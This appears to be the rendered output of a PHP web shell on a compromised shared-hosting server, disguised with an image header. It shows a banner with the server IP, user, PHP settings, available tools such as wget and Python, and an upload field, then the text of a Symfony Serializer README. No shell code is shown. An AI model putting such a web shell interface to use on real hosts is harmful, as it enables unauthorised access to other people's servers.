����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 18.188.250.166 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/alt/php54/usr/share/doc/pear/Serializer/Symfony/Component/Serializer/ |
Upload File : |
Serializer Component ==================== With the Serializer component its possible to handle serializing data structures, including object graphs, into array structures or other formats like XML and JSON. It can also handle deserializing XML and JSON back to object graphs. Resources --------- You can run the unit tests with the following command: $ cd path/to/Symfony/Component/Serializer/ $ composer.phar install $ phpunit